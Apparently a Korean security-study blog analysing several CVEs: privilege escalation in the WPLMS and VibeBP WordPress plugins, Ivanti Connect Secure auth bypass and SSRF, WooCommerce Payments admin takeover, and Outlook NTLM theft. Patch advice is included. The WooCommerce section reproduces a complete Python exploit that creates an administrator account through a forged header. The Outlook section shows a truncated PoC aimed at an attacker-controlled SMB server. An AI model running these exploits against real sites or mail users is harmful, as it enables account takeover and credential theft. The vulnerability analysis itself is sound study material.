꼰머의 보안공부

1. WPLMS 플러그인 (WordPress Learning Management System)

- WordPress를 사용해 LMS를 구축할 수 있도록 돕는 플러그인

※ Learning Management System : 학습 관리 시스템, 온라인으로 학생들의 학습을 관리할 수 있게 해주는 소프트웨어

2. VibeBP (Vibe BuddyPress Plugin)

- WPLMS와 함께 사용되는 플러그인으로, 강력한 소셜 네트워킹 및 회원 관리 기능을 제공

3. 취약점

3.1 CVE-2024-56043 [2][3]

- WPLMS의 잘못된 권한 할당으로 인한 권한 상승 취약점 (CVSS: 9.8)

영향받는 버전 : WPLMS <= 1.9.9

- includes/vibe-shortcodes/ajaxcalls.php의 wplms_register_user()에 취약점 존재

> wp_ajax_nopriv_wplms_register_user()에 의해 호출되어, 사용자 등록(≒ 회원가입)을 처리하는 함수
> Line7 : 사용자 입력인 $_POST['settings'] 값을 JSON으로 디코딩하여 $settings에 할당
> Line59 ~ Line62 : $setting 객체의 id 값을 확인해 default_role인 경우 $setting 객체의 value 값을 $user_args['role']에 할당
> Line100 : wp_insert_user($user_args)를 사용해 새로운 사용자 생성

※ WordPress의 default_role은 6가지의 값을 가짐 : Super Admin, Administrator, Editor, Author, Contributor, Subscriber [4]

- 사용자 입력으로 전달된 default_role에 대한 검증 없이 user_args['role']에 할당되므로, 임의의 역할을 지정해 권한을 상승(Super Admin, Administrator)할 수 있음

includes/vibe-shortcodes/ajaxcalls.php, function wplms_register_user()
1     function wplms_register_user(){
2         if ( !isset($_POST['security']) || !wp_verify_nonce($_POST['security'],'bp_new_signup') || !isset($_POST['settings'])){
3             echo '<div class="message">'.__('Security check Failed. Contact Administrator.','wplms').'</div>';
4             die();
5         }
6         $flag = 0;
7         $settings = json_decode(stripslashes($_POST['settings']));
8         if(empty($settings)){
9             $flag = 1; 
10         }
11     ------------- CUT HERE -------------
12     
13         $user_args = $user_fields = $save_settings = array();
14     
15         if(empty($flag)){
16     
17     ------------- CUT HERE -------------
18     
19             foreach($settings as $setting){
20     
21                 if(!empty($setting->id)){
22                     $settings2[] = $setting->id;
23                     if($setting->id == 'signup_username'){
24                         $user_args['user_login'] = $setting->value;
25                     }else if($setting->id == 'signup_email'){
26                         $user_args['user_email'] = $setting->value;
27                     }else if($setting->id == 'signup_password'){
28                         $user_args['user_pass'] = $setting->value;
29                     }else{
30                         if(strpos($setting->id,'field') !== false){
31     
32                             $f = explode('_',$setting->id);
33                             $field_id = $f[1]; 
34                             if(strpos($field_id, '[')){ //checkbox
35                                 $v = str_replace('[','',$field_id);
36                                 $v = str_replace(']','',$v);
37                                 $field_id = $v;
38                                 if(is_Array($user_fields[$field_id]['value'])){
39                                     $user_fields[$field_id]['value'][] = $setting->value;
40                                 }else{
41                                     $user_fields[$field_id] = array('value'=>array($setting->value));
42                                 }
43                             }else{
44                                 if(is_numeric($field_id) && !isset($f[2])){
45                                     $user_fields[$field_id] = array('value'=>$setting->value);
46                                 }else{
47                                     if(in_array($f[2],array('day','month','year'))){
48                                         $user_fields['field_' . $field_id . '_'.$f[2]] = $setting->value;
49                                     }else{
50                                         $user_fields[$field_id]['visibility']=$setting->value;    
51                                     }
52                                 }
53                             }
54                             
55                         }else{
56                             if(isset($form_settings[$setting->id])){
57                             
58                                 $form_settings[$setting->id] = 0; // use it for empty check 
59                                 if($setting->id=='default_role'){
60                                     $save_settings[$setting->id]=$setting->value;
61                                     $user_args['role'] = $setting->value;
62                                 }
63                                 if($setting->id=='member_type'){
64                                     $save_settings[$setting->id]=$setting->value;
65                                     $member_type=$setting->value;
66                                 }
67                                 if($setting->id=='wplms_user_bp_group'){
68                                     if(in_array($setting->value,$reg_form_settings['settings']['wplms_user_bp_group']) || $reg_form_settings['settings']['wplms_user_bp_group'] === array('enable_user_select_group')){
69                                         $save_settings[$setting->id]=$setting->value;
70                                         $wplms_user_bp_group = $setting->value;
71                                     }else{
72                                         echo '<div class="message_wrap"><div class="message error">'._x('Invalid Group selection','error message when group is not valid','wplms').'<span></span></div></div>';
73                                         die();
74                                     }
75                                     
76                                 }
77                             }
78                             
79                         }
80                     }
81                 }
82             }
83             if(!in_array('wplms_user_bp_group', $settings2)){
84                 if(!empty($reg_form_settings['settings']['wplms_user_bp_group']) && is_array($reg_form_settings['settings']['wplms_user_bp_group']) && $reg_form_settings['settings']['wplms_user_bp_group'] !== array('enable_user_select_group') && count($reg_form_settings['settings']['wplms_user_bp_group'])==1){
85                     $wplms_user_bp_group = $reg_form_settings['settings']['wplms_user_bp_group'][0];
86                 }
87             }
88         }
89     
90     ------------- CUT HERE -------------
91     
92         /*
93         FORM SETTINGS
94         */
95         if(empty($form_settings['hide_username'])){
96             $user_args['user_login'] = $user_args['user_email'];
97         }
98         $user_id = 0;
99         if(empty($form_settings['skip_mail'])){
100             $user_id = wp_insert_user($user_args);
101     
102     ------------- CUT HERE -------------

3.2 CVE-2024-56048 [5][6]

- WPLMS의 권한 검증 누락으로 인한 권한 확대 취약점

영향받는 버전 : WPLMS <= 1.9.9

- include/vibe-customtypes/includes/musettings.php의 update_license_key()에 취약점 존재
> Line2 ~ Line5 : 해당 요청이 WordPress 내에서 생성된 유효한 요청인지 확인
> Line6 ~ Line9 : $_POST['addon'] 및 $_POST['key'] 값이 비어있지 않은지 확인
> Line10 : $_POST['addon'] 및 $_POST['key'] 값을 사용해 옵션 값 업데이트

- 각 값에 대한 검증이 누락되어, 권한을 확대할 수 있음
> wp_verify_nonce()에 사용되는 nonce 값은 인증된 사용자의 경우 누구나 검증 우회 가능
> $_POST['addon'] 및 $_POST['key'] 값이 비어있는지만 검증 하므로 임의의 값을 전달할 수 있음
> $_POST['addon'] 및 $_POST['key'] 값을 사용해 원하는 만큼 검증 없이 옵션 값 업데이트 가능

includes/vibe-customtypes/includes/musettings.php, function update_license_key()
1     function update_license_key(){
2     if ( !isset($_POST['security']) || !wp_verify_nonce($_POST['security'],'security')){
3     _e('Security check Failed. Contact Administrator.','wplms');
4     die();
5     }
6     if(empty($_POST['addon']) || empty($_POST['key'])){
7     _e('Unable to update key.','wplms');
8     die();
9     }
10     update_option($_POST['addon'],$_POST['key']);
11     echo apply_filters('wplms_addon_license_key_updated',__('Key Updated.','wplms'));
12     die();
13     }

3.3 CVE-2024-56040 [7][8]

- VibeBP의 잘못된 권한 할당으로 인한 권한 상승 취약점 (CVSS: 9.8)

영향받는 버전 : VibeBP <= 1.9.9.4.1

- includes/class.ajax.php의 vibebp_register_user()에 취약점 존재
> wp_ajax_nopriv_wplms_register_user()에 의해 호출되어, 사용자 등록(≒ 회원가입)을 처리하는 함수
> Line7 : 사용자 입력인 $_POST['settings'] 값을 JSON으로 디코딩하여 $settings에 할당
> Line60 ~ Line63 : $setting 객체의 id 값을 확인해 default_role인 경우 $setting 객체의 value 값을 $user_args['role']에 할당
> Line138 : wp_insert_user($user_args)를 사용해 새로운 사용자 생성

- 사용자 입력으로 전달된 default_role에 대한 검증 없이 user_args['role']에 할당되므로, 임의의 역할을 지정해 권한을 상승(Super Admin, Administrator)할 수 있음

includes/class.ajax.php, function vibebp_register_user()
1     function vibebp_register_user(){
2         if ( !isset($_POST['security']) || !wp_verify_nonce($_POST['security'],'bp_new_signup') || !isset($_POST['settings'])){
3             echo '<div class="message">'.__('Security check Failed. Contact Administrator.','wplms').'</div>';
4             die();
5         }
6         $flag = 0;
7         $settings = json_decode(stripslashes($_POST['settings']));
8         if(empty($settings)){
9             $flag = 1; 
10         }
11     
12     ------------- CUT HERE -------------
13     
14         $user_args = $user_fields = $save_settings = array();
15     
16         if(empty($flag)){
17     
18     ------------- CUT HERE -------------
19     
20             foreach($settings as $setting){
21     
22                 if(!empty($setting->id)){
23                     $settings2[] = $setting->id;
24                     if($setting->id == 'signup_username'){
25                         $user_args['user_login'] = $setting->value;
26                     }else if($setting->id == 'signup_email'){
27                         $user_args['user_email'] = $setting->value;
28                     }else if($setting->id == 'signup_password'){
29                         $user_args['user_pass'] = $setting->value;
30                     }else{
31                         if(strpos($setting->id,'field') !== false){
32     
33                             $f = explode('_',$setting->id);
34                             $field_id = $f[1]; 
35                             if(strpos($field_id, '[')){ //checkbox
36                                 $v = str_replace('[','',$field_id);
37                                 $v = str_replace(']','',$v);
38                                 $field_id = $v;
39                                 if(is_Array($user_fields[$field_id]['value'])){
40                                     $user_fields[$field_id]['value'][] = $setting->value;
41                                 }else{
42                                     $user_fields[$field_id] = array('value'=>array($setting->value));
43                                 }
44                             }else{
45                                 if(is_numeric($field_id) && !isset($f[2])){
46                                     $user_fields[$field_id] = array('value'=>$setting->value);
47                                 }else{
48                                     if(in_array($f[2],array('day','month','year'))){
49                                         $user_fields['field_' . $field_id . '_'.$f[2]] = $setting->value;
50                                     }else{
51                                         $user_fields[$field_id]['visibility']=$setting->value;    
52                                     }
53                                 }
54                             }
55                             
56                         }else{
57                             if(isset($form_settings[$setting->id])){
58                             
59                                 $form_settings[$setting->id] = 0; // use it for empty check 
60                                 if($setting->id=='default_role'){
61                                     $save_settings[$setting->id]=$setting->value;
62                                     $user_args['role'] = $setting->value;
63                                 }
64                                 if($setting->id=='member_type'){
65                                     $save_settings[$setting->id]=$setting->value;
66                                     $member_type=$setting->value;
67                                 }
68                                 if($setting->id=='vibebp_user_bp_group'){
69                                     if(in_array($setting->value,$reg_form_settings['settings']['vibebp_user_bp_group']) || $reg_form_settings['settings']['vibebp_user_bp_group'] === array('enable_user_select_group')){
70                                         $save_settings[$setting->id]=$setting->value;
71                                         $vibebp_user_bp_group = $setting->value;
72                                     }else{
73                                         echo '<div class="message_wrap"><div class="message error">'._x('Invalid Group selection','error message when group is not valid','wplms').'<span></span></div></div>';
74                                         die();
75                                     }
76                                     
77                                 }
78                             }
79                             
80                         }
81                     }
82                 }
83             }
84             if(!in_array('vibebp_user_bp_group', $settings2)){
85                 if(!empty($reg_form_settings['settings']['vibebp_user_bp_group']) && is_array($reg_form_settings['settings']['vibebp_user_bp_group']) && $reg_form_settings['settings']['vibebp_user_bp_group'] !== array('enable_user_select_group') && count($reg_form_settings['settings']['vibebp_user_bp_group'])==1){
86                     $vibebp_user_bp_group = $reg_form_settings['settings']['vibebp_user_bp_group'][0];
87                 }
88             }
89         }
90     
91     
92     
93         $user_args = apply_filters('vibebp_register_user_args',$user_args);
94         
95     
96         //hook for validations externally
97         do_action('vibebp_custom_registration_form_validations',$name,$settings,$all_form_settings,$user_args);
98         do_action('wplms_custom_registration_form_validations',$name,$settings,$all_form_settings,$user_args);
99     
100         /*
101         RUN CONDITIONAL CHECKS
102         */
103         $check_filter = filter_var($user_args['user_email'], FILTER_VALIDATE_EMAIL); // PHP 5.3
104         if(empty($user_args['user_email']) || empty($user_args['user_pass']) || empty($check_filter)){
105             echo '<div class="message_wrap"><div class="message error">'._x('Invalid Email/Password !','error message when registration form is empty','wplms').'<span></span></div></div>';
106             die();
107         }
108     
109         //Check if user exists
110         if(!isset($user_args['user_email']) || email_exists($user_args['user_email'])){
111             echo '<div class="message_wrap"><div class="message error">'._x('Email already registered.','error message','wplms').'<span></span></div></div>';
112             die();
113         }
114     
115         //Check if user exists
116         if(!isset($user_args['user_login'])){
117     
118             $user_args['user_login'] = $user_args['user_email'];
119             if(email_exists($user_args['user_login'])){
120                 echo '<div class="message_wrap"><div class="message error">'._x('Username already registered.','error message','wplms').'<span></span></div></div>';
121                 die();
122             }
123         }elseif (username_exists($user_args['user_login'])){
124             echo '<div class="message_wrap"><div class="message error">'._x('Username already registered.','error message','wplms').'<span></span></div></div>';
125             die();
126         }
127         
128     ------------- CUT HERE -------------
129     
130         /*
131         FORM SETTINGS
132         */
133         if(empty($form_settings['hide_username'])){
134             $user_args['user_login'] = $user_args['user_email'];
135         }
136         $user_id = 0;
137         if(empty($form_settings['skip_mail'])){
138             $user_id = wp_insert_user($user_args);
139     
140     ------------- CUT HERE -------------

4. 대응방안

- 벤더사 제공 업데이트 적용 [9][10]
> WPLMS Plugin 1.9.9.5.3
> Vibebp 1.9.9.7.7

> 사용자가 등록할 수 있는 역할을 제한하는 패치 적용
> 추가 권한 검사를 구현하고 업데이트할 수 있는 옵션 이름에 대한 허용 목록 검사 적용

5. 참고

[1] https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wplms-and-vibebp-plugins/
[2] https://nvd.nist.gov/vuln/detail/CVE-2024-56043
[3] https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-unauthenticated-privilege-escalation-vulnerability
[4] https://developer.wordpress.org/plugins/users/roles-and-capabilities/
[5] https://nvd.nist.gov/vuln/detail/CVE-2024-56048
[6] https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-arbitrary-option-update-to-privilege-escalation-vulnerability
[7] https://nvd.nist.gov/vuln/detail/CVE-2024-56040
[8] https://patchstack.com/database/wordpress/plugin/vibebp/vulnerability/wordpress-vibebp-plugin-1-9-9-4-1-unauthenticated-privilege-escalation-vulnerability
[9] https://wplms.io/support/knowledge-base/vibebp-1-9-9-7-7-wplms-plugin-1-9-9-5-2/
[10] https://asec.ahnlab.com/ko/85311/

1. 개요

- Ivanti Connect Secure, Policy Secure에서 새로운 제로데이 취약점 발견

> 권한 상승 취약점 (CVE-2024-21888) 및 SSRF 취약점(CVE-2024-21893)

> 해당 취약점을 악용해 다수의 국내 기업들 포함 전세계 650여개 이상 기업 공격 시도

> 원격 명령 실행을 위해 백도어 DSLog를 설치하기 위해 CVE-2024-21893 악용

2. 취약점

2.1 CVE-2024-21888

- 취약한 버전의 Ivanti Connect Secure, Ivanti Policy Secure에서 발생하는 권한 상승 취약점

> 웹 구성요소 권한 상승 취약점으로 인해 관리자 권한으로 권한 상승 가능 [2]

> 악용에 성공한 공격자는 SAML 구성 요소에 있는 SSRF 취약점으로 인해 공격자가 인증 없이 제한된 특정 리소스에 접근 가능  (CVE-2024-21893) [2]

영향받는 버전: Ivanti Connect Secure 및 Ivanti Policy Secure 9.x, 22.x

- 서버에 요청이 전달되기 전 URI를 테스트하여 인증 필요 여부를 확인하는 doAuthCheck() 존재

> 해당 함수에서 /dana-ws/saml20.ws 등 특정 경로의 경우 인증이 강제되지 않음

※ CVE-2023-46805: doAuthCheck()에서 /api/v1/totp/user-backup-code 경로의 경우 인증이 강제되지 않음

  if ( !memcmp(uri_path_1, "/dana-na/", 9u)
    || !memcmp(a1->uri_path, "/dana-cached/setup/", 0x13u)
    || !memcmp(a1->uri_path, "/dana-cached/sc/", 0x10u)
    || !strncmp(uri_path1, "/dana-cached/hc/", 0x10u)
    || !strncmp(uri_path1, "/dana-cached/cc/", 0x10u)
    || !strncmp(uri_path1, "/dana-cached/ep/", 0x10u)
    || !strncmp(uri_path1, "/dana-cached/psal/", 0x12u)
    || !strncmp(uri_path1, "/dana-cached/remediation/", 0x19u)
    || !strncmp(uri_path1, "/dana-ws/saml20.ws", 0x12u) // <--- No auth for this SAML endpoint, CVE-2024-21888
    || !strncmp(uri_path1, "/dana-ws/samlecp.ws", 0x13u)
    || !strncmp(uri_path1, "/adfs/ls", 8u)
    || !strncmp(uri_path1, "/api/v1/profiler/", 0x11u)
    || !strncmp(uri_path1, "/api/v1/cav/client/", 0x13u) && strncmp(uri_path1, "/api/v1/cav/client/auth_token", 0x1Du) )
  {
    return 1;
  }
  v18 = (const void *)getDevice(a1->dwordC);
  if ( (unsigned __int8)sub_873D0(a1->uri_path, v18) )
    return 1;
  uri_path = a1->uri_path;
  if ( !strncmp((const char *)uri_path, "/api/v1/ueba/", 0xDu)
    || !strncmp((const char *)uri_path, "/api/v1/integration/", 0x14u)
    || !strncmp((const char *)uri_path, "/api/v1/dsintegration", 0x15u)
    || !strncmp((const char *)uri_path, "/api/v1/pps/action/", 0x13u)
    || !strncmp((const char *)uri_path, "/api/my-session", 0xFu)
    || !strncmp((const char *)uri_path, "/api/v1/totp/user-backup-code", 0x1Du) // CVE-2023-46805
    || !strncmp((const char *)uri_path, "/api/v1/esapdata", 0x10u)
    || !strncmp((const char *)uri_path, "/api/v1/sessions", 0x10u)
    || !strncmp((const char *)uri_path, "/api/v1/tasks", 0xDu)
    || !strncmp((const char *)uri_path, "/api/v1/gateways", 0x10u)
    || !strncmp((const char *)uri_path, "/_/api/aaa", 0xAu)
    || !strncmp((const char *)uri_path, "/api/v1/oidc", 0xCu) )
  {
    return 1;
  }

- 웹 서버의 함수 doDispatchRequest()는 특정 URL에 대해 인증되지 않은 POST 요청을 백엔드 서비스 saml-server로 전달

> /dana-ws/saml.ws, /dana-ws/saml20.ws, /dana-ws/samlcp.ws 경로의 경우 인증이 수행되지 않음

> 인증되지 않은 POST 요청을 웹 서버의 DSWSMLHandler 클래스를 통해 saml-server로 디스패치

※ saml-server: /home/bin/saml-server 

  if ( !strncmp(v33, "/dana-ws/saml.ws", 0x10u)
        || !strncmp(v33, "/dana-ws/saml20.ws", 0x12u) // <--- our unauthenticated path
        || !strncmp(v33, "/dana-ws/samlecp.ws", 0x13u) )
      {
        if ( !byte_13EBE0 && __cxa_guard_acquire((__guard *)&byte_13EBE0) )
        {
          v37 = "Watchdog";
          if ( !*((_BYTE *)a1 + 240) )
            v37 = "WebRequest";
          dword_13EC54 = DSGetStatementCounter("request.cc", 5283, "doDispatchRequest", v37, 10, "Dispatching to SAML");
          __cxa_guard_release((__guard *)&byte_13EBE0);
        }
        ++*(_QWORD *)dword_13EC54;
        if ( DSLog::Debug::isOn(v76) )
        {
          v34 = "Watchdog";
          if ( !*((_BYTE *)a1 + 240) )
            v34 = "WebRequest";
          DSLog::Debug::Write(
            (DSLog::Debug *)v34,
            &byte_9[1],
            (int)"request.cc",
            (const char *)&elf_gnu_hash_chain[440] + 3,
            (int)"Dispatching to SAML",
            v92);
        }
        DSCockpitCounter::updateCounter(0, 1);
        if ( !byte_13EBE8 && __cxa_guard_acquire((__guard *)&byte_13EBE8) )
        {
          dword_13EC50 = DSGetStatementCounter(
                           "request.cc",
                           5285,
                           "doDispatchRequest",
                           "WebRequest",
                           60,
                           "DSCockpitCounter Webhits Incremented");
          __cxa_guard_release((__guard *)&byte_13EBE8);
        }
        ++*(_QWORD *)dword_13EC50;
        if ( DSLog::Debug::isOn(v77) )
          DSLog::Debug::Write(
            (DSLog::Debug *)"WebRequest",
            off_3C,
            (int)"request.cc",
            (const char *)&elf_gnu_hash_chain[441] + 1,
            (int)"DSCockpitCounter Webhits Incremented",
            v92);
        DSCockpitCounter::updateCounter(4, 1);
        return sub_86980((int)a1) != 0; // <--- dispatch to saml-server via DSWSSAMLHandler
      }

2.2 CVE-2024-21893

- SAML 구성 요소에 있는 SSRF 취약점으로 인해 공격자가 제한된 특정 리소스에 인증 없이 엑세스할 수 있는 취약점

> 영향받는 버전은 CVE-2024-21888과 동일

- saml-server는 SOAP 요청을 포함한 모든 SAML 작업을 담당

> SoapHandler()는 모든 XML 처리를 위해 xmltooling 라이브러리를 호출

※ SoapHandler()는 createXMLObjectFromSoapMessage()를 통해 들어오는 POST 요청의 콘텐츠 데이터를 XML 개체로 변환하는 함수

- XML 처리에 사용되는 xmltooling 라이브러리의 버전은 3.0.2

> 해당 xmltooling의 경우 최신 버전이 아니며, SSRF 취약점인 CVE-2023-36661에 영향을 받는 버전 [4][5]

> SSRF 취약점 트리거를 위해 KeyInfo의 RetrievalMethod 속성을 이용

> 해당 속성 사용시 XMLToolingFIPS.XMLObject.Signature()가 GET 요청을 통해 원격 리소스를 요청하는데 사용할 URI 지정 가능

> PoC [6]

※ CVE-2023-36661: xmltooling 3.2.4 이전 버전에서 조작된 KeyInfo 요소로 인해 발생하는 SSRF 취약점

3. 대응방안

- 벤더사 제공 최신 업데이트 적용 [8][9]

- "/dana-ws/saml20.ws" 탐지룰 적용

4. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-21888
[2] https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis?referrer=notificationEmail
[3] https://nvd.nist.gov/vuln/detail/CVE-2024-21893
[4] https://nvd.nist.gov/vuln/detail/CVE-2023-36661
[5] https://shibboleth.net/community/advisories/secadv_20230612.txt
[6] https://github.com/h4x0r-dz/CVE-2024-21893.py
[7] https://blog.sonicwall.com/en-us/2024/02/ivanti-server-side-request-forgery-to-auth-bypass/
[8] https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
[9] https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&bbsId=B0000133&searchWrd=&menuNo=205020&pageIndex=1&categoryCode=&nttId=71320
[10] https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
[11] https://blog.sonicwall.com/en-us/2024/02/ivanti-server-side-request-forgery-to-auth-bypass/
[12] https://www.dailysecu.com/news/articleView.html?idxno=153513
[13] https://www.boannews.com/media/view.asp?idx=126369&page=15&kind=1
[14] https://www.boannews.com/media/view.asp?idx=126665&page=1&kind=1

1. WordPress WooCommerce Payments 플러그인

- WordPress란 사용자가 전문적인 기술과 지식 없이도 웹사이트에서 콘텐츠를 생성, 관리 및 수정할 수 있도록 도와주는 CMS(Contents Management System)

- WooCommerce Payments란 오픈 소스 전자상거래 솔루션

2. 취약점

- WordPress용 WooCommerce Payments 플러그인에 조작된 요청을 보내 인증되지 않은 사용자가 관리자 권한을 얻을 수 있는 취약점 (CVSS 9.8)

- 2023.07.14부터 지속적으로 공격이 이루어지고 있음

- 영향받는 버전
WordPress용 WooCommerce Payments 플러그인 버전 5.6.1 이하

2.1 분석

- 해당 취약점은 Platform-Checkout-Session.php의 init()에서 발생

> Line 25에서 요청 메시지의 쿠키를 사용해 현재 사용자 결정

add_filter( 'determine_current_user', [ __CLASS__, 'determine_current_user_for_platform_checkout' ] );

> Line 36~46 determinate_current_user_for_platform_checkout()에서 특정 헤더 값을 이용해 사용자 결정

⒜ 관련 헤더: X-WCPAY-PLATFORM-CHECKOUT-USER

⒝ 해당 헤더 값이 존재할 경우 검증없이 단순히 값을 반환하여 사용자를 결정

  public static function determine_current_user_for_platform_checkout( $user ) {
    if ( $user ) {
      return $user;
    }
    if ( ! isset( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) || ! is_numeric( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) ) {
      return null;
    }
    return (int) $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'];
  }

- Platform-Checkout-Session.php 중 취약점과 관련된 코드의 일부

<?php
/**
 * Class WC_Payments_Session.
 *
 * @package WooCommerce\Payments
 */

namespace WCPay\Platform_Checkout;

/**
 * Class responsible for handling platform checkout sessions.
 * This class should be loaded as soon as possible so the correct session is loaded.
 * So don't load it in the WC_Payments::init() function.
 */
class Platform_Checkout_Session {

  const PLATFORM_CHECKOUT_SESSION_COOKIE_NAME = 'platform_checkout_session';

  /**
   * Init the hooks.
   *
   * @return void
   */
  public static function init() {
    add_filter( 'determine_current_user', [ __CLASS__, 'determine_current_user_for_platform_checkout' ] );
    add_filter( 'woocommerce_cookie', [ __CLASS__, 'determine_session_cookie_for_platform_checkout' ] );
  }

  /**
   * Sets the current user as the user sent via the api from WooPay if present.
   *
   * @param \WP_User|null|int $user user to be used during the request.
   *
   * @return \WP_User|null|int
   */
  public static function determine_current_user_for_platform_checkout( $user ) {
    if ( $user ) {
      return $user;
    }

    if ( ! isset( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) || ! is_numeric( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) ) {
      return null;
    }

    return (int) $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'];
  }

  /**
   * Tells WC to use platform checkout session cookie if the header is present.
   *
   * @param string $cookie_hash Default cookie hash.
   *
   * @return string
   */
  public static function determine_session_cookie_for_platform_checkout( $cookie_hash ) {
    if ( isset( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) && 0 === (int) $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) {
      return self::PLATFORM_CHECKOUT_SESSION_COOKIE_NAME;
    }

    return $cookie_hash;
  }
}

2.2 PoC

- 공개된 PoC의 동작은 다음과 같음

① readme.txt를 통해 대상 시스템에서 사용중인 WooCommerce Payments 플러그인의 버전을 확인해 취약 여부 확인

② 취약한 버전일 경우 /wp-json/wp/v2/users API 인터페이스를 활용해 사용자 추가

③ X-WCPAY-PLATFORM-CHECKOUT-USER 헤더 값을 1로 설정

> 일반적으로 첫 번째 사용자는 관리자이므로, 1로 설정하는 것으로 판단됨

④ 공격자가 관리자 권한을 가진 계정을 생성하게 됨

> determinate_current_user_for_platform_checkout()에 의해 검증없이 관리자 권한으로 설정됨

# CVE-2023-28121
# WooCommerce Payments Unauthorized Administrator Access Exploit 
# by Secragon
# PoC for educational/research purposes only
# Use it at your own risk!

import re
import sys
import urllib3
import requests
import argparse
from colorama import Fore, Style

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


username = "secragon"
password = "OffensiveSecurity123"
email = "exploit@secragon.com"

def check_version(target):
    
    print(Style.RESET_ALL + "Site version:", end=' ')
    try:
        r = requests.get(f"{target}/wp-content/plugins/woocommerce-payments/readme.txt", verify=False)
        version = re.search(r"Stable tag: (.*)", r.text).groups()[0]

    except:
        print(Fore.RED + f'error...')
        exit()


    if int(version.replace('.','')) < 562:
        print(Fore.GREEN + f'{version} - vulnerable!')
    else:
        print(Fore.RED + f'{version} - not vulnerable!')
        exit()

def add_admin(target):

    headers = {
        'User-Agent': 'Secragon Offensive Agent',
        'X-WCPAY-PLATFORM-CHECKOUT-USER': '1'
    }

    data = {
        'rest_route' : '/wp/v2/users',
        'username' : username,
        'email': email,
        'password': password,
        'roles':'administrator'
    }

    print(Style.RESET_ALL + "Getting session:", end =' ')

    s = requests.Session()
    try:
        r = s.get(f'{target}', headers=headers, verify=False)
        print(Fore.GREEN + f'done')
    except:
        print(Fore.RED + f'error...')
        exit()

    print(Style.RESET_ALL + "Adding a new admin:", end =' ')


    r = s.post(f'{target}', data=data, headers=headers, verify=False)
    if r.status_code == 201:
        print(Fore.GREEN + f'done')
    else:
        print(Fore.RED + f'error...')
        exit()


    print(Style.RESET_ALL + "All set! You can now login using the following credentials:")
    print(f'Username: {username}')
    print(f'Password: {password}')
    print()



print()
print(Fore.BLUE + "\t\t --- WooCommerce Payments exploit ---")
print("\t\t      (unauthorized admin access)")
print(Fore.RED + "\t\t\t\t\tby gbrsh@secragon & gnomer0x@secragon")
print(Style.RESET_ALL)


parser = argparse.ArgumentParser()

parser.add_argument('url', help='http://wphost')

if len(sys.argv) == 1:
    parser.print_help()
    print()
    exit()

args = parser.parse_args()

check_version(args.url)
add_admin(args.url)

- 공격자의 조작된 요청에의해 서버에서 201 Created 응답이 발생하며, 악성 계정이 정상적으로 생성

> 201 Created: POST, PUT 메소드 등으로 새로운 데이터를 서버에 생성하는 작업이 성공했음을 나타내는 상태코드

3. 대응방안

① 벤더사에서 제공하는 패치를 적용

- 해당 취약점은 2023.03.23 벤더사에서 패치를 배포

※ 패치 버전에서는 init() 포함되어 있는 Platform-Checkout-Session.php 파일을 삭제한 것으로 판단됨

4. 참고

[1] https://news.wp-kr.com/wordpress-start-guide/#index-wordpress
[2] https://woocommerce.com/payments/
[3] https://nvd.nist.gov/vuln/detail/CVE-2023-28121
[4] https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/
[5] https://developer.wordpress.org/reference/hooks/determine_current_user/
[6] https://github.com/gbrsh/CVE-2023-28121
[7] https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/
[8] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&nttId=71028&menuNo=205020
[9] https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/#google_vignette
[10] https://www.boannews.com/media/view.asp?idx=120266&page=1&kind=1 

1. Microsoft Outlook

- 마이크로소프트 오피스의 구성 요소 (이메일 소프트웨어)

1.1 용어

2. 취약점

- Microsoft Outlook에서 발생하는 권한 상승 취약점으로, CVSS 9.8을 할당 받음

- 피해자가 메일을 읽지 않아도 공격자는 피해자의 NTLM 정보를 탈취할 수 있음

- 취약한 버전 목록 [2][3]

※ Android, iOS, Mac과 같은 다른 버전의 Microsoft Outlook과 웹용 Outlook 및 기타 M365 서비스는 영향을 받지 않음

2.1 공격 원리 [4][5][6]

- Outlook의 캘린더에는 약속한 일정을 사용자에게 알려주는 '미리 알림' 기능이 존재하며, 약속 기한이 지났을 때도 알림을 발생

- MAPI의 "PidLidReminderFileParameter"는 약속 기한이 지나, 지연 알림에 클라이언트가 재생할 사운드의 파일 경로(UNC)를 지정하는 데 사용됨 [7]

- 또한 "PidLidReminderOverride"는 PidLidReminderFileParameter 값을 신뢰할 것인지 결정 [8]

- 공격자는 메일에 "PidLidReminderFileParameter" 값을 공격자가 제어 가능한 SMB 서버로, "PidLidReminderOverride"을 true로 설정하여 전송

2.2 PoC [9]

- 공격자가 제어하는 SMB서버의 주소를 BAD_ADDRESS 변수에 저장
- send_meeting_request()를 이용해 조작된 메일을 생성 및 전송

#!/usr/bin/env python3

__author__ = "William Golembieski"
__license__ = "Apache License 2.0"
__email__ = "william@armoryanalytics.com"

import win32com.client

OUTLOOK_FORMAT = '%m/%d/%Y %H:%M'
def outlook_date(dt): return dt.strftime(OUTLOOK_FORMAT)


class OutlookClient(object):
    def __init__(self):
        self.outlook = win32com.client.Dispatch('Outlook.Application')

    def send_meeting_request(self, subject, time, location, recipients, body, bad_location):
        mtg = self.outlook.CreateItem(1)
